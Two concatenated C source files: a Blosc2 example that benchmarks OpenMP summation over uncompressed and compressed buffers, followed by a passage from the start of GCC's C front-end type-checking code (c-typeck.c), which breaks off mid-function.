sum_openmp.c

/*
Copyright (C) 2021 The Blosc Developers <blosc@blosc.org>
https://blosc.org
License: BSD 3-Clause (see LICENSE.txt)
Example program showing how to operate with compressed buffers.
To compile this program for synthetic data (default):
$ gcc -fopenmp -O3 sum_openmp.c -o sum_openmp -lblosc2
To run:
$ OMP_PROC_BIND=spread OMP_NUM_THREADS=8 ./sum_openmp
Blosc version info: 2.0.0a6.dev ($Date:: 2018-05-18 #$)
Sum for uncompressed data: 199950000000
Sum time for uncompressed data: 0.0288 s, 26459.3 MB/s
Compression ratio: 762.9 MB -> 14.0 MB (54.6x)
Compression time: 0.288 s, 2653.5 MB/s
Sum for *compressed* data: 199950000000
Sum time for *compressed* data: 0.0188 s, 40653.7 MB/s
To use real (rainfall) data:
$ gcc -DRAINFALL -fopenmp -Ofast sum_openmp.c -o sum_openmp -lblosc2
And running it:
$ OMP_PROC_BIND=spread OMP_NUM_THREADS=8 ./sum_openmp
Blosc version info: 2.0.0a6.dev ($Date:: 2018-05-18 #$)
Sum for uncompressed data: 29741012
Sum time for uncompressed data: 0.0149 s, 25627.4 MB/s
Compression ratio: 381.5 MB -> 71.3 MB (5.3x)
Compression time: 1.53 s, 249.1 MB/s
Sum for *compressed* data: 29741012
Sum time for *compressed* data: 0.0247 s, 15467.5 MB/s
*/
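/* Runtime knobs read below in main(): SUM_COMPRESSOR selects the codec by
name, SUM_CLEVEL the compression level, and OMP_NUM_THREADS the number of
threads used for the sums. A hypothetical invocation combining them:
$ SUM_COMPRESSOR=lz4 SUM_CLEVEL=5 OMP_NUM_THREADS=4 ./sum_openmp */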
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <errno.h>
#include <assert.h>
#include "blosc2.h"
#define KB 1024.
#define MB (1024*KB)
#define GB (1024*MB)
#define N (100 * 1000 * 1000)
#define CHUNKSIZE (16 * 1000)
#define NCHUNKS (N / CHUNKSIZE)
#define NTHREADS 8
#define NITER 5
#ifdef RAINFALL
#define SYNTHETIC false
#else
#define SYNTHETIC true
#endif
#if SYNTHETIC == true
#define DTYPE int64_t
#define CLEVEL 3
#define CODEC BLOSC_BLOSCLZ
#else
#define DTYPE float
#define CLEVEL 1
#define CODEC BLOSC_LZ4
#endif
int main(void) {
static DTYPE udata[N];
DTYPE chunk_buf[CHUNKSIZE];
int32_t isize = CHUNKSIZE * sizeof(DTYPE);
DTYPE sum, compressed_sum;
int64_t nbytes, cbytes;
blosc2_schunk* schunk;
int i, j, nchunk;
blosc_timestamp_t last, current;
double ttotal, itotal;
char* envvar = NULL;
printf("Blosc version info: %s (%s)\n",
BLOSC_VERSION_STRING, BLOSC_VERSION_DATE);
// Fill the buffer for a chunk
if (SYNTHETIC) {
for (j = 0; j < CHUNKSIZE; j++) {
chunk_buf[j] = j;
}
}
else {
struct stat info;
const char *filegrid = "rainfall-grid-150x150.bin";
if (stat(filegrid, &info) != 0) {
printf("Grid file %s not found!", filegrid);
exit(1);
}
char *cdata = malloc(info.st_size);
FILE *f = fopen(filegrid, "rb");
size_t blocks_read = fread(cdata, info.st_size, 1, f);
assert(blocks_read == 1);
fclose(f);
int dsize = blosc_getitem(cdata, 0, CHUNKSIZE, chunk_buf);
if (dsize < 0) {
printf("blosc_getitem() error. Error code: %d\n. Probably reading too much data?", dsize);
exit(1);
}
free(cdata);
}
// Fill the uncompressed dataset with data chunks
for (i = 0; i < N / CHUNKSIZE; i++) {
for (j = 0; j < CHUNKSIZE; j++) {
udata[i * CHUNKSIZE + j] = chunk_buf[j];
}
}
// Reduce uncompressed dataset
ttotal = 1e10;
sum = 0;
for (int n = 0; n < NITER; n++) {
sum = 0;
blosc_set_timestamp(&last);
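// Each OpenMP thread accumulates a private partial sum over its share of
// the iterations; the reduction clause merges the partials at the end.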
#pragma omp parallel for reduction (+:sum)
for (i = 0; i < N; i++) {
sum += udata[i];
}
blosc_set_timestamp(&current);
itotal = blosc_elapsed_secs(last, current);
if (itotal < ttotal) ttotal = itotal;
}
printf("Sum for uncompressed data: %10.0f\n", (double)sum);
printf("Sum time for uncompressed data: %.3g s, %.1f MB/s\n",
ttotal, (double)(isize * NCHUNKS) / (double)(ttotal * MB));
// Create a super-chunk container for the compressed container
long codec = CODEC;
envvar = getenv("SUM_COMPRESSOR");
if (envvar != NULL) {
codec = blosc_compname_to_compcode(envvar);
if (codec < 0) {
printf("Unknown compresssor: %s\n", envvar);
return 1;
}
}
blosc2_cparams cparams = BLOSC2_CPARAMS_DEFAULTS;
cparams.compcode = (uint8_t)codec;
long clevel = CLEVEL;
envvar = getenv("SUM_CLEVEL");
if (envvar != NULL) {
clevel = strtol(envvar, NULL, 10);
}
cparams.clevel = (uint8_t)clevel;
cparams.typesize = sizeof(DTYPE);
cparams.nthreads = 1;
blosc2_dparams dparams = BLOSC2_DPARAMS_DEFAULTS;
dparams.nthreads = 1;
blosc_set_timestamp(&last);
blosc2_storage storage = {.cparams=&cparams, .dparams=&dparams};
schunk = blosc2_schunk_new(&storage);
for (nchunk = 0; nchunk < NCHUNKS; nchunk++) {
for (i = 0; i < CHUNKSIZE; i++) {
chunk_buf[i] = udata[i + nchunk * CHUNKSIZE];
}
blosc2_schunk_append_buffer(schunk, chunk_buf, isize);
}
blosc_set_timestamp(&current);
ttotal = blosc_elapsed_secs(last, current);
nbytes = schunk->nbytes;
cbytes = schunk->cbytes;
printf("Compression ratio: %.1f MB -> %.1f MB (%.1fx)\n",
nbytes / MB, cbytes / MB, (1. * nbytes) / cbytes);
printf("Compression time: %.3g s, %.1f MB/s\n",
ttotal, nbytes / (ttotal * MB));
int nthreads = NTHREADS;
envvar = getenv("OMP_NUM_THREADS");
if (envvar != NULL) {
errno = 0;
long value = strtol(envvar, NULL, 10);
if (errno == 0 && value > 0) {
nthreads = (int)value;
}
}
// Build buffers and contexts for computations
int nchunks_thread = NCHUNKS / nthreads;
int remaining_chunks = NCHUNKS - nchunks_thread * nthreads;
blosc2_context **dctx = malloc(nthreads * sizeof(void*));
DTYPE** chunk = malloc(nthreads * sizeof(void*));
for (j = 0; j < nthreads; j++) {
// One private decompression context per thread: blosc2 contexts must not
// be shared across threads. Created once here (instead of inside the
// timed loop) to avoid leaking a context per iteration; freed at the end.
dctx[j] = blosc2_create_dctx(dparams);
chunk[j] = malloc(CHUNKSIZE * sizeof(DTYPE));
}
// Reduce compressed dataset
ttotal = 1e10;
compressed_sum = 0;
for (int n = 0; n < NITER; n++) {
compressed_sum = 0;
blosc_set_timestamp(&last);
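// Each thread decompresses its own range of chunks with its own context
// (dctx[j]) into its own buffer (chunk[j]), so no locking is needed; the
// per-thread sums are merged by the reduction clause.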
#pragma omp parallel for private(i, nchunk) reduction (+:compressed_sum)
for (j = 0; j < nthreads; j++) {
for (nchunk = 0; nchunk < nchunks_thread; nchunk++) {
blosc2_decompress_ctx(dctx[j], schunk->data[j * nchunks_thread + nchunk], INT32_MAX,
(void*)(chunk[j]), isize);
for (i = 0; i < CHUNKSIZE; i++) {
compressed_sum += chunk[j][i];
//compressed_sum += i + (j * nchunks_thread + nchunk) * CHUNKSIZE;
}
}
}
for (nchunk = NCHUNKS - remaining_chunks; nchunk < NCHUNKS; nchunk++) {
blosc2_decompress_ctx(dctx[0], schunk->data[nchunk], INT32_MAX, (void*)(chunk[0]), isize);
for (i = 0; i < CHUNKSIZE; i++) {
compressed_sum += chunk[0][i];
//compressed_sum += i + nchunk * CHUNKSIZE;
}
}
blosc_set_timestamp(&current);
itotal = blosc_elapsed_secs(last, current);
if (itotal < ttotal) ttotal = itotal;
}
printf("Sum for *compressed* data: %10.0f\n", (double)compressed_sum);
printf("Sum time for *compressed* data: %.3g s, %.1f MB/s\n",
ttotal, nbytes / (ttotal * MB));
//printf("sum, csum: %f, %f\n", sum, compressed_sum);
if (SYNTHETIC) {
// exact equality is difficult to fulfill for single-precision data
assert(sum == compressed_sum);
}
/* Free resources */
for (j = 0; j < nthreads; j++) {
blosc2_free_ctx(dctx[j]);
free(chunk[j]);
}
free(dctx);
free(chunk);
blosc2_schunk_free(schunk);
return 0;
}

c-typeck.c

/* Build expressions with type checking for C compiler.
Copyright (C) 1987-2020 Free Software Foundation, Inc.
This file is part of GCC.
GCC is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; either version 3, or (at your option) any later
version.
GCC is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
for more details.
You should have received a copy of the GNU General Public License
along with GCC; see the file COPYING3. If not see
<http://www.gnu.org/licenses/>. */
/* This file is part of the C front end.
It contains routines to build C expressions given their operands,
including computing the types of the result, C-specific error checks,
and some optimization. */
#include "config.h"
#include "system.h"
#include "coretypes.h"
#include "memmodel.h"
#include "target.h"
#include "function.h"
#include "bitmap.h"
#include "c-tree.h"
#include "gimple-expr.h"
#include "predict.h"
#include "stor-layout.h"
#include "trans-mem.h"
#include "varasm.h"
#include "stmt.h"
#include "langhooks.h"
#include "c-lang.h"
#include "intl.h"
#include "tree-iterator.h"
#include "gimplify.h"
#include "tree-inline.h"
#include "omp-general.h"
#include "c-family/c-objc.h"
#include "c-family/c-ubsan.h"
#include "gomp-constants.h"
#include "spellcheck-tree.h"
#include "gcc-rich-location.h"
#include "stringpool.h"
#include "attribs.h"
#include "asan.h"
/* Possible cases of implicit bad conversions. Used to select
diagnostic messages in convert_for_assignment. */
enum impl_conv {
ic_argpass,
ic_assign,
ic_init,
ic_return
};
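/* For illustration with hypothetical user code, given
void f (char *);
int *p;
each context selects a different diagnostic wording:
f (p); => ic_argpass
char *q; q = p; => ic_assign
char *r = p; => ic_init
return p; => ic_return (in a function returning char *) */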
/* The level of nesting inside "__alignof__". */
int in_alignof;
/* The level of nesting inside "sizeof". */
int in_sizeof;
/* The level of nesting inside "typeof". */
int in_typeof;
/* The argument of last parsed sizeof expression, only to be tested
if expr.original_code == SIZEOF_EXPR. */
tree c_last_sizeof_arg;
location_t c_last_sizeof_loc;
/* Nonzero if we might need to print a "missing braces around
initializer" message within this initializer. */
static int found_missing_braces;
static int require_constant_value;
static int require_constant_elements;
static bool null_pointer_constant_p (const_tree);
static tree qualify_type (tree, tree);
static int tagged_types_tu_compatible_p (const_tree, const_tree, bool *,
bool *);
static int comp_target_types (location_t, tree, tree);
static int function_types_compatible_p (const_tree, const_tree, bool *,
bool *);
static int type_lists_compatible_p (const_tree, const_tree, bool *, bool *);
static tree lookup_field (tree, tree);
static int convert_arguments (location_t, vec<location_t>, tree,
vec<tree, va_gc> *, vec<tree, va_gc> *, tree,
tree);
static tree pointer_diff (location_t, tree, tree, tree *);
static tree convert_for_assignment (location_t, location_t, tree, tree, tree,
enum impl_conv, bool, tree, tree, int,
int = 0);
static tree valid_compound_expr_initializer (tree, tree);
static void push_string (const char *);
static void push_member_name (tree);
static int spelling_length (void);
static char *print_spelling (char *);
static void warning_init (location_t, int, const char *);
static tree digest_init (location_t, tree, tree, tree, bool, bool, int);
static void output_init_element (location_t, tree, tree, bool, tree, tree, bool,
bool, struct obstack *);
static void output_pending_init_elements (int, struct obstack *);
static bool set_designator (location_t, bool, struct obstack *);
static void push_range_stack (tree, struct obstack *);
static void add_pending_init (location_t, tree, tree, tree, bool,
struct obstack *);
static void set_nonincremental_init (struct obstack *);
static void set_nonincremental_init_from_string (tree, struct obstack *);
static tree find_init_member (tree, struct obstack *);
static void readonly_warning (tree, enum lvalue_use);
static int lvalue_or_else (location_t, const_tree, enum lvalue_use);
static void record_maybe_used_decl (tree);
static int comptypes_internal (const_tree, const_tree, bool *, bool *);
/* Return true if EXP is a null pointer constant, false otherwise. */
static bool
null_pointer_constant_p (const_tree expr)
{
/* This should really operate on c_expr structures, but they aren't
yet available everywhere required. */
tree type = TREE_TYPE (expr);
return (TREE_CODE (expr) == INTEGER_CST
&& !TREE_OVERFLOW (expr)
&& integer_zerop (expr)
&& (INTEGRAL_TYPE_P (type)
|| (TREE_CODE (type) == POINTER_TYPE
&& VOID_TYPE_P (TREE_TYPE (type))
&& TYPE_QUALS (TREE_TYPE (type)) == TYPE_UNQUALIFIED)));
}
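/* By this definition, 0, '\0' and (void *) 0 are null pointer constants,
while (const void *) 0 is not (the pointed-to type is qualified) and
(char *) 0 is not (the pointed-to type is not void). */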
/* EXPR may appear in an unevaluated part of an integer constant
expression, but not in an evaluated part. Wrap it in a
C_MAYBE_CONST_EXPR, or mark it with TREE_OVERFLOW if it is just an
INTEGER_CST and we cannot create a C_MAYBE_CONST_EXPR. */
static tree
note_integer_operands (tree expr)
{
tree ret;
if (TREE_CODE (expr) == INTEGER_CST && in_late_binary_op)
{
ret = copy_node (expr);
TREE_OVERFLOW (ret) = 1;
}
else
{
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (expr), NULL_TREE, expr);
C_MAYBE_CONST_EXPR_INT_OPERANDS (ret) = 1;
}
return ret;
}
/* Having checked whether EXPR may appear in an unevaluated part of an
integer constant expression and found that it may, remove any
C_MAYBE_CONST_EXPR noting this fact and return the resulting
expression. */
static inline tree
remove_c_maybe_const_expr (tree expr)
{
if (TREE_CODE (expr) == C_MAYBE_CONST_EXPR)
return C_MAYBE_CONST_EXPR_EXPR (expr);
else
return expr;
}
/* This is a cache to hold if two types are compatible or not. */
struct tagged_tu_seen_cache {
const struct tagged_tu_seen_cache * next;
const_tree t1;
const_tree t2;
/* The return value of tagged_types_tu_compatible_p if we had seen
these two types already. */
int val;
};
static const struct tagged_tu_seen_cache * tagged_tu_seen_base;
static void free_all_tagged_tu_seen_up_to (const struct tagged_tu_seen_cache *);
/* Do `exp = require_complete_type (loc, exp);' to make sure exp
does not have an incomplete type. (That includes void types.)
LOC is the location of the use. */
tree
require_complete_type (location_t loc, tree value)
{
tree type = TREE_TYPE (value);
if (error_operand_p (value))
return error_mark_node;
/* First, detect a valid value with a complete type. */
if (COMPLETE_TYPE_P (type))
return value;
c_incomplete_type_error (loc, value, type);
return error_mark_node;
}
/* Print an error message for invalid use of an incomplete type.
VALUE is the expression that was used (or 0 if that isn't known)
and TYPE is the type that was invalid. LOC is the location for
the error. */
void
c_incomplete_type_error (location_t loc, const_tree value, const_tree type)
{
/* Avoid duplicate error message. */
if (TREE_CODE (type) == ERROR_MARK)
return;
if (value != NULL_TREE && (VAR_P (value) || TREE_CODE (value) == PARM_DECL))
error_at (loc, "%qD has an incomplete type %qT", value, type);
else
{
retry:
/* We must print an error message. Be clever about what it says. */
switch (TREE_CODE (type))
{
case RECORD_TYPE:
case UNION_TYPE:
case ENUMERAL_TYPE:
break;
case VOID_TYPE:
error_at (loc, "invalid use of void expression");
return;
case ARRAY_TYPE:
if (TYPE_DOMAIN (type))
{
if (TYPE_MAX_VALUE (TYPE_DOMAIN (type)) == NULL)
{
error_at (loc, "invalid use of flexible array member");
return;
}
type = TREE_TYPE (type);
goto retry;
}
error_at (loc, "invalid use of array with unspecified bounds");
return;
default:
gcc_unreachable ();
}
if (TREE_CODE (TYPE_NAME (type)) == IDENTIFIER_NODE)
error_at (loc, "invalid use of undefined type %qT", type);
else
/* If this type has a typedef-name, the TYPE_NAME is a TYPE_DECL. */
error_at (loc, "invalid use of incomplete typedef %qT", type);
}
}
/* Given a type, apply default promotions wrt unnamed function
arguments and return the new type. */
tree
c_type_promotes_to (tree type)
{
tree ret = NULL_TREE;
if (TYPE_MAIN_VARIANT (type) == float_type_node)
ret = double_type_node;
else if (c_promoting_integer_type_p (type))
{
/* Preserve unsignedness if not really getting any wider. */
if (TYPE_UNSIGNED (type)
&& (TYPE_PRECISION (type) == TYPE_PRECISION (integer_type_node)))
ret = unsigned_type_node;
else
ret = integer_type_node;
}
if (ret != NULL_TREE)
return (TYPE_ATOMIC (type)
? c_build_qualified_type (ret, TYPE_QUAL_ATOMIC)
: ret);
return type;
}
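/* E.g. float promotes to double, and char and short promote to int (or,
for an unsigned type whose precision equals that of int, to unsigned
int). */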
/* Return true if there is a superset named address space that
encompasses both address spaces AS1 and AS2. If there is one, store
it in *COMMON. */
static bool
addr_space_superset (addr_space_t as1, addr_space_t as2, addr_space_t *common)
{
if (as1 == as2)
{
*common = as1;
return true;
}
else if (targetm.addr_space.subset_p (as1, as2))
{
*common = as2;
return true;
}
else if (targetm.addr_space.subset_p (as2, as1))
{
*common = as1;
return true;
}
else
return false;
}
/* Return a variant of TYPE which has all the type qualifiers of LIKE
as well as those of TYPE. */
static tree
qualify_type (tree type, tree like)
{
addr_space_t as_type = TYPE_ADDR_SPACE (type);
addr_space_t as_like = TYPE_ADDR_SPACE (like);
addr_space_t as_common;
/* If the two named address spaces are different, determine the common
superset address space. If there isn't one, raise an error. */
if (!addr_space_superset (as_type, as_like, &as_common))
{
as_common = as_type;
error ("%qT and %qT are in disjoint named address spaces",
type, like);
}
return c_build_qualified_type (type,
TYPE_QUALS_NO_ADDR_SPACE (type)
| TYPE_QUALS_NO_ADDR_SPACE_NO_ATOMIC (like)
| ENCODE_QUAL_ADDR_SPACE (as_common));
}
/* Return true iff the given tree T is a variable length array. */
bool
c_vla_type_p (const_tree t)
{
if (TREE_CODE (t) == ARRAY_TYPE
&& C_TYPE_VARIABLE_SIZE (t))
return true;
return false;
}
/* If NTYPE is a type of a non-variadic function with a prototype
and OTYPE is a type of a function without a prototype and ATTRS
contains attribute format, diagnoses and removes it from ATTRS.
Returns the result of build_type_attribute_variant of NTYPE and
the (possibly) modified ATTRS. */
static tree
build_functype_attribute_variant (tree ntype, tree otype, tree attrs)
{
if (!prototype_p (otype)
&& prototype_p (ntype)
&& lookup_attribute ("format", attrs))
{
warning_at (input_location, OPT_Wattributes,
"%qs attribute cannot be applied to a function that "
"does not take variable arguments", "format");
attrs = remove_attribute ("format", attrs);
}
return build_type_attribute_variant (ntype, attrs);
}
/* Return the composite type of two compatible types.
We assume that comptypes has already been done and returned
nonzero; if that isn't so, this may crash. In particular, we
assume that qualifiers match. */
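/* For example (the case from C99 6.2.7p5), given
int f (int (*) (), double (*) [3]);
int f (int (*) (char *), double (*) []);
the composite type of the two function types is
int f (int (*) (char *), double (*) [3]); */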
tree
composite_type (tree t1, tree t2)
{
enum tree_code code1;
enum tree_code code2;
tree attributes;
/* Save time if the two types are the same. */
if (t1 == t2) return t1;
/* If one type is nonsense, use the other. */
if (t1 == error_mark_node)
return t2;
if (t2 == error_mark_node)
return t1;
code1 = TREE_CODE (t1);
code2 = TREE_CODE (t2);
/* Merge the attributes. */
attributes = targetm.merge_type_attributes (t1, t2);
/* If one is an enumerated type and the other is the compatible
integer type, the composite type might be either of the two
(DR#013 question 3). For consistency, use the enumerated type as
the composite type. */
if (code1 == ENUMERAL_TYPE && code2 == INTEGER_TYPE)
return t1;
if (code2 == ENUMERAL_TYPE && code1 == INTEGER_TYPE)
return t2;
gcc_assert (code1 == code2);
switch (code1)
{
case POINTER_TYPE:
/* For two pointers, do this recursively on the target type. */
{
tree pointed_to_1 = TREE_TYPE (t1);
tree pointed_to_2 = TREE_TYPE (t2);
tree target = composite_type (pointed_to_1, pointed_to_2);
t1 = build_pointer_type_for_mode (target, TYPE_MODE (t1), false);
t1 = build_type_attribute_variant (t1, attributes);
return qualify_type (t1, t2);
}
case ARRAY_TYPE:
{
tree elt = composite_type (TREE_TYPE (t1), TREE_TYPE (t2));
int quals;
tree unqual_elt;
tree d1 = TYPE_DOMAIN (t1);
tree d2 = TYPE_DOMAIN (t2);
bool d1_variable, d2_variable;
bool d1_zero, d2_zero;
bool t1_complete, t2_complete;
/* We should not have any type quals on arrays at all. */
gcc_assert (!TYPE_QUALS_NO_ADDR_SPACE (t1)
&& !TYPE_QUALS_NO_ADDR_SPACE (t2));
t1_complete = COMPLETE_TYPE_P (t1);
t2_complete = COMPLETE_TYPE_P (t2);
d1_zero = d1 == NULL_TREE || !TYPE_MAX_VALUE (d1);
d2_zero = d2 == NULL_TREE || !TYPE_MAX_VALUE (d2);
d1_variable = (!d1_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d1)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d1)) != INTEGER_CST));
d2_variable = (!d2_zero
&& (TREE_CODE (TYPE_MIN_VALUE (d2)) != INTEGER_CST
|| TREE_CODE (TYPE_MAX_VALUE (d2)) != INTEGER_CST));
d1_variable = d1_variable || (d1_zero && c_vla_type_p (t1));
d2_variable = d2_variable || (d2_zero && c_vla_type_p (t2));
/* Save space: see if the result is identical to one of the args. */
if (elt == TREE_TYPE (t1) && TYPE_DOMAIN (t1)
&& (d2_variable || d2_zero || !d1_variable))
return build_type_attribute_variant (t1, attributes);
if (elt == TREE_TYPE (t2) && TYPE_DOMAIN (t2)
&& (d1_variable || d1_zero || !d2_variable))
return build_type_attribute_variant (t2, attributes);
if (elt == TREE_TYPE (t1) && !TYPE_DOMAIN (t2) && !TYPE_DOMAIN (t1))
return build_type_attribute_variant (t1, attributes);
if (elt == TREE_TYPE (t2) && !TYPE_DOMAIN (t2) && !TYPE_DOMAIN (t1))
return build_type_attribute_variant (t2, attributes);
/* Merge the element types, and have a size if either arg has
one. We may have qualifiers on the element types. To set
up TYPE_MAIN_VARIANT correctly, we need to form the
composite of the unqualified types and add the qualifiers
back at the end. */
quals = TYPE_QUALS (strip_array_types (elt));
unqual_elt = c_build_qualified_type (elt, TYPE_UNQUALIFIED);
t1 = build_array_type (unqual_elt,
TYPE_DOMAIN ((TYPE_DOMAIN (t1)
&& (d2_variable
|| d2_zero
|| !d1_variable))
? t1
: t2));
/* Ensure a composite type involving a zero-length array type
is a zero-length type not an incomplete type. */
if (d1_zero && d2_zero
&& (t1_complete || t2_complete)
&& !COMPLETE_TYPE_P (t1))
{
TYPE_SIZE (t1) = bitsize_zero_node;
TYPE_SIZE_UNIT (t1) = size_zero_node;
}
t1 = c_build_qualified_type (t1, quals);
return build_type_attribute_variant (t1, attributes);
}
case ENUMERAL_TYPE:
case RECORD_TYPE:
case UNION_TYPE:
if (attributes != NULL)
{
/* Try harder not to create a new aggregate type. */
if (attribute_list_equal (TYPE_ATTRIBUTES (t1), attributes))
return t1;
if (attribute_list_equal (TYPE_ATTRIBUTES (t2), attributes))
return t2;
}
return build_type_attribute_variant (t1, attributes);
case FUNCTION_TYPE:
/* Function types: prefer the one that specified arg types.
If both do, merge the arg types. Also merge the return types. */
{
tree valtype = composite_type (TREE_TYPE (t1), TREE_TYPE (t2));
tree p1 = TYPE_ARG_TYPES (t1);
tree p2 = TYPE_ARG_TYPES (t2);
int len;
tree newargs, n;
int i;
/* Save space: see if the result is identical to one of the args. */
if (valtype == TREE_TYPE (t1) && !TYPE_ARG_TYPES (t2))
return build_functype_attribute_variant (t1, t2, attributes);
if (valtype == TREE_TYPE (t2) && !TYPE_ARG_TYPES (t1))
return build_functype_attribute_variant (t2, t1, attributes);
/* Simple way if one arg fails to specify argument types. */
if (TYPE_ARG_TYPES (t1) == NULL_TREE)
{
t1 = build_function_type (valtype, TYPE_ARG_TYPES (t2));
t1 = build_type_attribute_variant (t1, attributes);
return qualify_type (t1, t2);
}
if (TYPE_ARG_TYPES (t2) == NULL_TREE)
{
t1 = build_function_type (valtype, TYPE_ARG_TYPES (t1));
t1 = build_type_attribute_variant (t1, attributes);
return qualify_type (t1, t2);
}
/* If both args specify argument types, we must merge the two
lists, argument by argument. */
for (len = 0, newargs = p1;
newargs && newargs != void_list_node;
len++, newargs = TREE_CHAIN (newargs))
;
for (i = 0; i < len; i++)
newargs = tree_cons (NULL_TREE, NULL_TREE, newargs);
n = newargs;
for (; p1 && p1 != void_list_node;
p1 = TREE_CHAIN (p1), p2 = TREE_CHAIN (p2), n = TREE_CHAIN (n))
{
/* A null type means arg type is not specified.
Take whatever the other function type has. */
if (TREE_VALUE (p1) == NULL_TREE)
{
TREE_VALUE (n) = TREE_VALUE (p2);
goto parm_done;
}
if (TREE_VALUE (p2) == NULL_TREE)
{
TREE_VALUE (n) = TREE_VALUE (p1);
goto parm_done;
}
/* Given wait (union {union wait *u; int *i} *)
and wait (union wait *),
prefer union wait * as type of parm. */
if (TREE_CODE (TREE_VALUE (p1)) == UNION_TYPE
&& TREE_VALUE (p1) != TREE_VALUE (p2))
{
tree memb;
tree mv2 = TREE_VALUE (p2);
if (mv2 && mv2 != error_mark_node
&& TREE_CODE (mv2) != ARRAY_TYPE)
mv2 = TYPE_MAIN_VARIANT (mv2);
for (memb = TYPE_FIELDS (TREE_VALUE (p1));
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = TYPE_MAIN_VARIANT (mv3);
if (comptypes (mv3, mv2))
{
TREE_VALUE (n) = composite_type (TREE_TYPE (memb),
TREE_VALUE (p2));
pedwarn (input_location, OPT_Wpedantic,
"function types not truly compatible in ISO C");
goto parm_done;
}
}
}
if (TREE_CODE (TREE_VALUE (p2)) == UNION_TYPE
&& TREE_VALUE (p2) != TREE_VALUE (p1))
{
tree memb;
tree mv1 = TREE_VALUE (p1);
if (mv1 && mv1 != error_mark_node
&& TREE_CODE (mv1) != ARRAY_TYPE)
mv1 = TYPE_MAIN_VARIANT (mv1);
for (memb = TYPE_FIELDS (TREE_VALUE (p2));
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = TYPE_MAIN_VARIANT (mv3);
if (comptypes (mv3, mv1))
{
TREE_VALUE (n) = composite_type (TREE_TYPE (memb),
TREE_VALUE (p1));
pedwarn (input_location, OPT_Wpedantic,
"function types not truly compatible in ISO C");
goto parm_done;
}
}
}
TREE_VALUE (n) = composite_type (TREE_VALUE (p1), TREE_VALUE (p2));
parm_done: ;
}
t1 = build_function_type (valtype, newargs);
t1 = qualify_type (t1, t2);
}
/* FALLTHRU */
default:
return build_type_attribute_variant (t1, attributes);
}
}
/* Return the type of a conditional expression between pointers to
possibly differently qualified versions of compatible types.
We assume that comp_target_types has already been done and returned
nonzero; if that isn't so, this may crash. */
static tree
common_pointer_type (tree t1, tree t2)
{
tree attributes;
tree pointed_to_1, mv1;
tree pointed_to_2, mv2;
tree target;
unsigned target_quals;
addr_space_t as1, as2, as_common;
int quals1, quals2;
/* Save time if the two types are the same. */
if (t1 == t2) return t1;
/* If one type is nonsense, use the other. */
if (t1 == error_mark_node)
return t2;
if (t2 == error_mark_node)
return t1;
gcc_assert (TREE_CODE (t1) == POINTER_TYPE
&& TREE_CODE (t2) == POINTER_TYPE);
/* Merge the attributes. */
attributes = targetm.merge_type_attributes (t1, t2);
/* Find the composite type of the target types, and combine the
qualifiers of the two types' targets. Do not lose qualifiers on
array element types by taking the TYPE_MAIN_VARIANT. */
mv1 = pointed_to_1 = TREE_TYPE (t1);
mv2 = pointed_to_2 = TREE_TYPE (t2);
if (TREE_CODE (mv1) != ARRAY_TYPE)
mv1 = TYPE_MAIN_VARIANT (pointed_to_1);
if (TREE_CODE (mv2) != ARRAY_TYPE)
mv2 = TYPE_MAIN_VARIANT (pointed_to_2);
target = composite_type (mv1, mv2);
/* Strip array types to get correct qualifier for pointers to arrays */
quals1 = TYPE_QUALS_NO_ADDR_SPACE (strip_array_types (pointed_to_1));
quals2 = TYPE_QUALS_NO_ADDR_SPACE (strip_array_types (pointed_to_2));
/* For function types do not merge const qualifiers, but drop them
if used inconsistently. The middle-end uses these to mark const
and noreturn functions. */
if (TREE_CODE (pointed_to_1) == FUNCTION_TYPE)
target_quals = (quals1 & quals2);
else
target_quals = (quals1 | quals2);
/* If the two named address spaces are different, determine the common
superset address space. This is guaranteed to exist due to the
assumption that comp_target_type returned non-zero. */
as1 = TYPE_ADDR_SPACE (pointed_to_1);
as2 = TYPE_ADDR_SPACE (pointed_to_2);
if (!addr_space_superset (as1, as2, &as_common))
gcc_unreachable ();
target_quals |= ENCODE_QUAL_ADDR_SPACE (as_common);
t1 = build_pointer_type (c_build_qualified_type (target, target_quals));
return build_type_attribute_variant (t1, attributes);
}
/* Return the common type for two arithmetic types under the usual
arithmetic conversions. The default conversions have already been
applied, and enumerated types converted to their compatible integer
types. The resulting type is unqualified and has no attributes.
This is the type for the result of most arithmetic operations
if the operands have the given two types. */
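/* For instance, the common type of int and unsigned long is unsigned
long, and the common type of float and double is double. */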
static tree
c_common_type (tree t1, tree t2)
{
enum tree_code code1;
enum tree_code code2;
/* If one type is nonsense, use the other. */
if (t1 == error_mark_node)
return t2;
if (t2 == error_mark_node)
return t1;
if (TYPE_QUALS (t1) != TYPE_UNQUALIFIED)
t1 = TYPE_MAIN_VARIANT (t1);
if (TYPE_QUALS (t2) != TYPE_UNQUALIFIED)
t2 = TYPE_MAIN_VARIANT (t2);
if (TYPE_ATTRIBUTES (t1) != NULL_TREE)
t1 = build_type_attribute_variant (t1, NULL_TREE);
if (TYPE_ATTRIBUTES (t2) != NULL_TREE)
t2 = build_type_attribute_variant (t2, NULL_TREE);
/* Save time if the two types are the same. */
if (t1 == t2) return t1;
code1 = TREE_CODE (t1);
code2 = TREE_CODE (t2);
gcc_assert (code1 == VECTOR_TYPE || code1 == COMPLEX_TYPE
|| code1 == FIXED_POINT_TYPE || code1 == REAL_TYPE
|| code1 == INTEGER_TYPE);
gcc_assert (code2 == VECTOR_TYPE || code2 == COMPLEX_TYPE
|| code2 == FIXED_POINT_TYPE || code2 == REAL_TYPE
|| code2 == INTEGER_TYPE);
/* When one operand is a decimal float type, the other operand cannot be
a generic float type or a complex type. We also disallow vector types
here. */
if ((DECIMAL_FLOAT_TYPE_P (t1) || DECIMAL_FLOAT_TYPE_P (t2))
